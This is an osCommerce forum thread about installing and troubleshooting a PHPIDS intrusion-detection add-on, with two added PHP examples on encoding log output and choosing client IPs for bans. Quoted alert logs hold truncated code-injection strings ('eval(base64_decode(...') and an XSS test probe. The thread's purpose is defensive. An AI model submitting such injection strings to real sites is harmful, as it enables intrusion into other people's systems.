marcsinfo
Posted December 29, 2010

Hi,

After verifying once again, I have found a typo, I may have hit a key when pasting in the application_top.php file, sorry and thanks again for this great contribution.

Marc

VAZ2121
Posted January 16, 2011

There is a hack to the PHPIDS. A hacker has written a script directly to hit this add-on.

Here is the story...

The PHPIDS sends me a mail about any attempt to hack the site. Today I received this:

The following attack has been detected by PHPIDS
IP: 78.177.107.5
Date: 2011-01-15T21:29:58+00:00
Impact: 138
Affected tags: xss csrf id rfe lfi sqli
Affected parameters: REQUEST.file_contents=[...], POST.file_contents=[...]
Request URI: %2Fproduct_info.php%2Fadmin%2Ffile_manager.php%2Flogin.php%3Faction%3Dsave

I receive a lot of those mails. This is however a bit different, so I decided to take a look at it. I started the Admin, and would see the PHPIDS Log.

Now something happened. The code that this hacker wrote, started to execute in my Admin !!!

So there is no execution-filter in viewing the Log. The hacker has used this exploit in the PHPIDS !!!!.

I have checked all my files, nothing has changed. This was a mild hack, it only displayed a message in my Admin.

Regards,
Stig

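What the post above describes is stored request data being rendered as markup when the log is viewed. The unsafe rendering next to an encoded one, as an added example that is not part of the thread, the add-on or PHPIDS; the row layout, the sample values and the function names are assumptions:

```php
<?php
// Added example, not the add-on's code. The row layout (ip, name, value, page)
// and all function names are hypothetical.

/** Encode one logged field for display as HTML text. */
function encode_log_field(string $value, int $maxLen = 300): string
{
    // Decode for readability only; the result is still untrusted text.
    $text = urldecode($value);
    // Replace control characters so they cannot disturb the page source.
    $text = (string) preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '?', $text);
    if (strlen($text) > $maxLen) {
        $text = substr($text, 0, $maxLen) . ' [truncated]';
    }
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 (such as a character cut by substr) instead of returning ''.
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Unsafe variant, shown for contrast: logged markup is parsed by the browser. */
function render_row_unsafe(array $row): string
{
    return '<tr><td>' . $row['ip'] . '</td><td>' . $row['name'] . '</td><td>'
        . urldecode($row['value']) . '</td><td>' . urldecode($row['page'])
        . '</td></tr>';
}

/** Hardened variant: every column is encoded, because every column is request data. */
function render_row_safe(array $row): string
{
    $cells = [];
    foreach (['ip', 'name', 'value', 'page'] as $column) {
        $cells[] = '<td>' . encode_log_field((string) ($row[$column] ?? '')) . '</td>';
    }
    return '<tr>' . implode('', $cells) . '</tr>';
}

// Constructed sample row (not taken from a real log): harmless bold markup
// stands in for the HTML that arrived in the file_contents parameter.
$row = [
    'ip'    => '203.0.113.7',
    'name'  => 'POST.file_contents',
    'value' => '%3Cb%3Emarker%3C%2Fb%3E',
    'page'  => '%2Fproduct_info.php%3Faction%3Dsave',
];

// Compare the two outputs in the page source.
echo render_row_unsafe($row), "\n";
echo render_row_safe($row), "\n";
```

The request URI and parameter name are encoded as well, since both are supplied by the client just like the value.
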
design4dotcom
Posted January 19, 2011

I've looked through this post and didn't find anything that related to our problem. We installed this mod two weeks ago on OS 2.2 and since that time, we have received a DELUGE of emails. No error codes, so I'm assuming the mod is installed correctly. Here is a sample email.

The following attack has been detected by PHPIDS
IP: 74.179.238.17
Date: 2011-01-13T17:28:13-06:00
Impact: 14
Affected tags: xss csrf id rfe lfi
Affected parameters: COOKIE.__gutp=entrystamp%3D1294961008%7Csid%3D744d342d840d08c84bd807750173d6 7f%7Cstamp%3D1294961281%7Creferrer%3Dhttp%3A%2F%2Finfo.bellperformance.com%2 Fx-tra-lube-oil-treatment%2F%7Contime%3D246,
Request URI: /index.php?cPath=23_28
Origin: 174.121.10.217

or this one.

The following attack has been detected by PHPIDS
IP: 208.87.234.180 (71.43.111.162)
Date: 2011-01-14T09:42:24-06:00
Impact: 14
Affected tags: xss csrf rfe dos
Affected parameters: COOKIE.__gutp=entrystamp%3D1294949465%7Csid%3D61d87f99248116c748031e0728a30d 09%7Cstamp%3D1294949775%7Contime%3D99,
Request URI: /specials.php
Origin: 174.121.10.217

They just keep coming! Are these hacks? Honestly, I didn't expect that many. Or is there something else going on?

Thank you SO MUCH

Thank you in advance,
Michelle

celextel (Author)
Posted January 19, 2011

> I've looked through this post and didn't find anything that related to our problem. We installed this mod two weeks ago on OS 2.2 and since that time, we have received a DELUGE of emails. No error codes, so I'm assuming the mod is installed correctly. Here is a sample email.
>
> The following attack has been detected by PHPIDS
> IP: 74.179.238.17
> Date: 2011-01-13T17:28:13-06:00
> Impact: 14
> Affected tags: xss csrf id rfe lfi
> Affected parameters: COOKIE.__gutp=entrystamp%3D1294961008%7Csid%3D744d342d840d08c84bd807750173d6 7f%7Cstamp%3D1294961281%7Creferrer%3Dhttp%3A%2F%2Finfo.bellperformance.com%2 Fx-tra-lube-oil-treatment%2F%7Contime%3D246,
> Request URI: /index.php?cPath=23_28
> Origin: 174.121.10.217
>
> or this one.
>
> The following attack has been detected by PHPIDS
> IP: 208.87.234.180 (71.43.111.162)
> Date: 2011-01-14T09:42:24-06:00
> Impact: 14
> Affected tags: xss csrf rfe dos
> Affected parameters: COOKIE.__gutp=entrystamp%3D1294949465%7Csid%3D61d87f99248116c748031e0728a30d 09%7Cstamp%3D1294949775%7Contime%3D99,
> Request URI: /specials.php
> Origin: 174.121.10.217
>
> They just keep coming! Are these hacks? Honestly, I didn't expect that many. Or is there something else going on?
>
> Thank you SO MUCH

These are not hacks. It seems to be generated by a module for tracking the referrer in your website. You could include these values [COOKIE.__gutp and so on] under exclusions in PHPIDS admin.

design4dotcom
Posted February 14, 2011

Wow, thank you. That WORKED!!!

♥altoid
Posted February 14, 2011 (edited)

I was looking for the PHP IDS website at "http://php-ids.org/"

Got this message auf Deutsch:

Dieser Server ist nicht mehr in Betrieb. Bitte teilen Sie dem Betreiber mit, dass er seinen DNS auf die neue IP 46.4.40.248 umstellt.
schokokeks.org

A little googling came up with the revised site it seems. "http://phpids.org/"

I hope that's a valid site.

Edited February 14, 2011 by altoid

I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are.

celextel (Author)
Posted February 15, 2011

> I was looking for the PHP IDS website at "http://php-ids.org/"
>
> Got this message auf Deutsch:
>
> Dieser Server ist nicht mehr in Betrieb. Bitte teilen Sie dem Betreiber mit, dass er seinen DNS auf die neue IP 46.4.40.248 umstellt.
> schokokeks.org
>
> A little googling came up with the revised site it seems. "http://phpids.org/"
>
> I hope that's a valid site.

URL seems to have changed. You could do the download of PHPIDS 0.6.5 (ZIP) at the following URL: http://phpids.org/downloads/

♥altoid
Posted February 15, 2011

> URL seems to have changed. You could do the download of PHPIDS 0.6.5 (ZIP) at the following URL: http://phpids.org/downloads/

I will check that out. It looks like they still need to update some links on their new site. Some links there take you to the inactive URL.

Thanks

♥altoid
Posted February 25, 2011

> I will check that out. It looks like they still need to update some links on their new site. Some links there take you to the inactive URL.
>
> Thanks

Hello, I downloaded and installed the latest version of PHPIDS 0.6.5.

In the testing mode test 1 works as it should, showing the result at the top, but test 2 resulted in "http 406 not acceptable" error and not showing the results at the top.

celextel (Author)
Posted February 25, 2011

> Hello, I downloaded and installed the latest version of PHPIDS 0.6.5.
>
> In the testing mode test 1 works as it should, showing the result at the top, but test 2 resulted in "http 406 not acceptable" error and not showing the results at the top.

Please refer to first page of this thread in regard to this.

♥altoid
Posted February 25, 2011

> Please refer to first page of this thread in regard to this.

Thank you for the reference. I believe that means my host's server is capturing this input and generating the 406 error page. Which, on the face of it, is a layer of protection I might want unless there are other factors involved.

Anyway, thanks again, I do appreciate the help.

celextel (Author)
Posted February 25, 2011

> Thank you for the reference. I believe that means my host's server is capturing this input and generating the 406 error page. Which, on the face of it, is a layer of protection I might want unless there are other factors involved.
>
> Anyway, thanks again, I do appreciate the help.

It should show the test result even for 406. Please create a support request with your host in regard to this.

♥altoid
Posted February 25, 2011

> It should show the test result even for 406. Please create a support request with your host in regard to this.

I will do that and post back here what the outcome is. Thanks for the follow up.

Code Red
Posted March 1, 2011

First of all, thanks for this great contribution - it's scary to see the number of times a website is attacked per day! It mostly seems to be working fine, just a couple of issues -

1. The auto-ban function doesn't seem to work. I have the config settings as follows -

PHPIDS Module true
IP Ban Module true
Show Intrusion Result false
E-mail Log Impact Score 8
DB Log Impact Score 4
IP Ban Impact Score 15

However, despite attack impacts in excess of 38, none of the hacker's IPs have been automatically banned. I've added a "ban all" option to the log page to save doing them all individually, but obviously I'd rather the site did it automatically, as frequently the same IP will make several attempts and I'd prefer them blocked in the first instance. Has anyone else experienced this problem?

2. Frequently the IP address recorded is 127.0.0.1, which is no use to block obviously. However, sometimes the email report I get does log the actual IP address alongside the localhost address, for example -

IP: 87.111.138.205 (127.0.0.1)
Date: 2011-03-01T14:42:58+00:00
Impact: 38
Affected tags: xss csrf id rfe sqli lfi
Affected parameters: REQUEST.asc=eval%28base64_decode%28%5C%27ZXJyb3JfcmVwb3J0aW5nKDApO3NldF90aW1lX2xpbWl0KDApOw0KJH...etc etc (shortened for your viewing pleasure!)
Request URI: /index.php
Origin: 92.48.117.50

But when I check the log, it's been recorded just as 127.0.0.1... if the email message sent to me can log the real IP address, can the script be modified to pick this up and write it to the log?

Just a couple of issues, but aside from that, this is great work and I'm very grateful!

celextel (Author)
Posted March 2, 2011 (edited)

> First of all, thanks for this great contribution - it's scary to see the number of times a website is attacked per day! It mostly seems to be working fine, just a couple of issues -

1. Please refer to page 9 of this thread. We have mentioned as follows:

Changing the code in banned.php
$ip_2ban_address = $_SERVER['REMOTE_ADDR'];
to
$ip_2ban_address = tep_get_ip_address();
would be a better option.

Most of the IPs should get banned automatically. We should not have this problem.

2. We have not done any code changes to PHPIDS core module. Please make a request in regard to this in that forum.

Edited March 2, 2011 by celextel

Code Red
Posted March 2, 2011

> Changing the code in banned.php
> $ip_2ban_address = $_SERVER['REMOTE_ADDR'];
> to
> $ip_2ban_address = tep_get_ip_address();
> would be a better option.
>
> Most of the IPs should get banned automatically. We should not have this problem.

Actually, it was the opposite which fixed it! The code was already using tep_get_ip_address, changing it to $_SERVER['REMOTE_ADDR'] did the trick - IPs are now automatically banned, thank you!

celextel (Author)
Posted March 3, 2011 (edited)

> Actually, it was the opposite which fixed it! The code was already using tep_get_ip_address, changing it to $_SERVER['REMOTE_ADDR'] did the trick - IPs are now automatically banned, thank you!

You are correct. It should be: change
$ip_2ban_address = tep_get_ip_address();
to
$ip_2ban_address = $_SERVER['REMOTE_ADDR'];

Edited March 3, 2011 by celextel

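Why the choice between `$_SERVER['REMOTE_ADDR']` and a header-aware helper matters for auto-banning, as an added example that is not part of the thread or of the add-on. It assumes forwarding headers such as X-Forwarded-For are client-supplied unless the direct peer is a proxy you run; `TRUSTED_PROXIES`, `client_ip_for_ban()` and `is_bannable()` are hypothetical names.

```php
<?php
// Added example, not the add-on's code. TRUSTED_PROXIES and both function
// names are hypothetical; adjust the proxy list to your own hosting setup.

// Addresses of reverse proxies you operate (assumption: one local proxy).
const TRUSTED_PROXIES = ['127.0.0.1', '::1'];

/** Pick the address to log and ban for one request ($server is $_SERVER). */
function client_ip_for_ban(array $server, array $trusted = TRUSTED_PROXIES): string
{
    $peer = (string) ($server['REMOTE_ADDR'] ?? '');
    if (filter_var($peer, FILTER_VALIDATE_IP) === false) {
        return '';
    }
    // Direct connection: any forwarding header was written by the client,
    // so it must not decide who gets logged or banned.
    if (!in_array($peer, $trusted, true)) {
        return $peer;
    }
    // Peer is our own proxy: read X-Forwarded-For from right to left and
    // take the first hop that is not one of our proxies.
    $header = (string) ($server['HTTP_X_FORWARDED_FOR'] ?? '');
    foreach (array_reverse(explode(',', $header)) as $hop) {
        $hop = trim($hop);
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break; // malformed entry: stop trusting the rest of the header
        }
        if (!in_array($hop, $trusted, true)) {
            return $hop;
        }
    }
    return $peer;
}

/** Refuse bans that would lock out the server itself or its proxies. */
function is_bannable(string $ip, array $trusted = TRUSTED_PROXIES): bool
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return false;
    }
    $packed = inet_pton($ip);
    $loopback = (strlen($packed) === 4 && $packed[0] === "\x7f")
        || $packed === inet_pton('::1');
    return !$loopback && !in_array($ip, $trusted, true);
}

// Constructed requests (documentation address ranges, not from the thread).
$requests = [
    'direct, header claims loopback' => [
        'REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => '127.0.0.1'],
    'via local proxy' => [
        'REMOTE_ADDR' => '127.0.0.1', 'HTTP_X_FORWARDED_FOR' => '198.51.100.9'],
    'via local proxy, no header' => ['REMOTE_ADDR' => '127.0.0.1'],
];
foreach ($requests as $label => $server) {
    $ip = client_ip_for_ban($server);
    printf("%-32s %-15s %s\n", $label, $ip, is_bannable($ip) ? 'ban' : 'skip');
}
```
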
♥altoid
Posted March 6, 2011

> It should show the test result even for 406. Please create a support request with your host in regard to this.

This is a follow up to the 406 issue. I contacted my host support and didn't get much resolved. They said:

> Ok Steve, I did check with Tier 2, unfortunately, since this addon isn't our product, we can't be sure what is stopping this certain function from working. If you could check back with the developer and show him that phpinfo page I shared with you earlier, he might have a better idea for what on our server is preventing this certain aspect of the addon from working.

Celextel, I am content to let this go as is and not dwell on the issue anymore. If a 406 is thrown for such attempts, then the intruder can't even make it to my site with such parameters in the url. I would say that's a positive thing in its own right.

I thank you for the great support for this add on.

♥altoid
Posted March 19, 2011

Just a note to anyone who may follow this forum. Last night there was an attempt on my site involving base64 coding that PHPIDS flagged out.

Affected parameters: REQUEST.author_name=%5Bphp%5Deval%28base64_decode%28% ....and then the base64 string, not included here.....
Request URI: /links.php/contact.php

The impact score was 74.

This was the first such attempt on this site that I am aware of, so I ran Site Monitor and WinGrep just to be sure. All is OK.

celextel (Author)
Posted November 6, 2011

NEW!! PHPIDS for osCommerce 1.7 for osCommerce Online Merchant v2.3.1

1. admin/phpids_report.php, admin/banned_ip.php and banned.php files modified [for osCommerce Online Merchant v2.3.1 only]. Do not update these 3 files if you are using osCommerce Online Merchant v2.2.
2. Added one more column to the PHPIDS table. Run the installer file to add this column.
3. PHPIDS 0.7 is ready.

JoshBowe
Posted November 7, 2011

Hi,

Just installed PHPIDS on 2.3.1 and can't seem to get it to work. As soon as I turn it on through the admin control panel my website front page just won't load. :(

I've followed the steps exactly as they are in the install guide, my "phpids" file was uploaded to website.com/includes/phpids without the catalog part. Could that be causing the problem? Otherwise I did everything as it said.

Any help would be appreciated, cheers.

mhondebrink
Posted November 16, 2011

I got the following message when I try to do the following test http://www.example.com/?id=1&test=">XXX works fine

What can be the issue?

PLUGGER
Posted November 21, 2011

is there any way of having this send out emails to an alternate email address and not the owner of the store i.e. the store developer instead

and excuse me if i have missed the answer already

If it don't fit - Get a bigger hammer

guicher
Posted November 24, 2011 (edited)

Hi all,

I've just installed this contribution and I've checked the installation twice, so that I've made no errors. But I still have a problem. Before entering the test URLs I set the following settings.

PHPIDS Module : true
IP Ban Module : true
Show Intrusion Result : true
E-mail Log Impact Score : 8
DB Log Impact Score : 4
IP Ban Impact Score : 70

After entering the test URLs nothing happens. No message at the top of the page, no entries into the database and no emails received. Also nothing is written into the log file (which has chmod 777). When I enter an IP address manually into the banned IPs (via tools) the blocking works as it should.

Can anyone help me out here?

Kind regards
Rene Guicherit (aka guicher)

Edited November 24, 2011 by guicher

guicher
Posted November 25, 2011

> Hi all,
>
> I've just installed this contribution and I've checked the installation twice, so that I've made no errors. But I still have a problem. Before entering the test URLs I set the following settings.
>
> PHPIDS Module : true
> IP Ban Module : true
> Show Intrusion Result : true
> E-mail Log Impact Score : 8
> DB Log Impact Score : 4
> IP Ban Impact Score : 70
>
> After entering the test URLs nothing happens. No message at the top of the page, no entries into the database and no emails received. Also nothing is written into the log file (which has chmod 777). When I enter an IP address manually into the banned IPs (via tools) the blocking works as it should.
>
> Can anyone help me out here?
>
> Kind regards
> Rene Guicherit (aka guicher)

Just tested the website with Kyplex security scan. And know what! All kinds of intrusions are detected and reported. So I think it's working. Only the test URLs which came with the installation manual don't work?

Kind regards
guicher